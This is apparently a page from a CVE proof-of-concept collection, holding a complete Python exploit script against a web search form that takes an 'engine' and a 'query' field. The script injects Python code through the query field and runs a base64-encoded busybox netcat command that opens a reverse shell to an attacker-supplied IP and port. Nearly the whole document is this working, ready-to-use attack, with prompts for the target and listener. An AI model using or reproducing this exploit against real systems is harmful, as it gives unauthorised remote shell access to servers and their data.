4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!python
import base64
import requests
import time
import sys

print("Please start a netcat listener.")

ipaddress = input("What is your IP address? ")
port = input("What port is the listener using? ")
target = input("What's the target URL for the post form? For example: https://test.com/search ")

#Change the exploit code in payload if you want to use something that is not Busybox.
payload = ("busybox nc " + ipaddress + " " + port + " " + "-e bash")
payloadbyte = payload.encode('utf-8')
encodedpayload = base64.b64encode(payloadbyte).decode('utf-8')
exploitcode = ("', __import__('os').system('echo " + encodedpayload + " | base64 -d | bash -i')) \\")
exploitcode2 = exploitcode.replace("\\","#")

print(exploitcode2)

postdata = {
    	'engine': "Amazon",
    	'query': exploitcode2
}

print("Now sending a busybox payload that should call back to your listener at port " + port + ".")
response = requests.post(target, data = postdata)
time.sleep(3)
sys.exit()